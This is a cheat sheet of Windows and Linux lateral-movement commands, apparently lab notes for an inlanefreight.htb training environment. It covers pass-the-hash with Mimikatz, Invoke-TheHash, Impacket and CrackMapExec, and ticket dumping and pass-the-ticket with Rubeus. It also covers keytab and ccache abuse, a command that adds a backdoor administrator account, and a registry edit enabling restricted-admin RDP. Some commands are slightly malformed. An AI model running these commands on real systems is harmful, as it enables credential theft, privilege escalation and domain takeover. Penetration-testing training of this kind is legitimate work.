# Windows Lateral Movement

### Pass The Hash (Mimikatz)

```bash
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit
```

### Pass The Hash (Invoke-TheHash)

```powershell
# Import Module
Import-Module .\Invoke-TheHash.psd1

# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose

# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"
```

### Pass the Hash Impacket (Linux)

```bash
impacket-psexec administrator@<IP> -hashes :<hash>

```

### Pass The Hash CrackMapExec (LInux)

```bash
crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth
```

### Pass The Hash RDP

```powershell
# Enable RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# RDP
xfreerdp  /v:<IP> /u:<user> /pth:<hash>
```

### Harvesting Tickets From Windows

```bash
# Mimikatz
## Check Privs
privilege::debug

# Show Tickets
sekurlsa::tickets /export


# Rubeus
Rubeus.exe dump /nowrap
```

### Pass the Key or OverPass the Hash

```powershell
# Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys

# Mimikatz OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>

# Rubeus
Rubeus.exe  asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_Value>
```

### Pass the Ticket (PtT)

```powershell
# Rubeus
## /ptt -> current session
 Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value>

# Import .Kirbi 
Rubeus.exe ptt /ticket:file.kirbi

# Base64 Encode .Kirbi
Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))

# Import With Base64
Rubeus.exe ptt /ticket:<base64>
```

#### Pass The Ticket PowerShell Remoting

```bash
# Import Ticket
kerberos::ptt "file.kirbi"

# Enter PC
Enter-PSSession -ComputerName <computername>
```

### Pass The Ticket (From Linux)

#### Check Linux Machine Domain Joined

```bash
realm list

ps -ef | grep -i "winbind\|sssd"

```

#### Find Keytab Files

```bash
find / -name *keytab* -ls 2>/dev/null
```

#### Find ccache Files

A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.

```bash
env | grep -i krb5
```

#### Abusing KeyTab Files

```bash
# Klist List Keytab files
klist -k -l

# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Verify 
klist
```

#### Keytab Extract

```python
python3 /opt/blackbuntu/keytabextract.py file.keytab
```

#### Abusing Keytab ccache

To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.

```bash
# Import ccache file
export KRB5CCNAME=<fileL
klist

# Able to read DC
smbclient //dc01/C$ -k -c ls -no-pass
```

#### Convert ccache file for Windows

```bash
https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py
```

####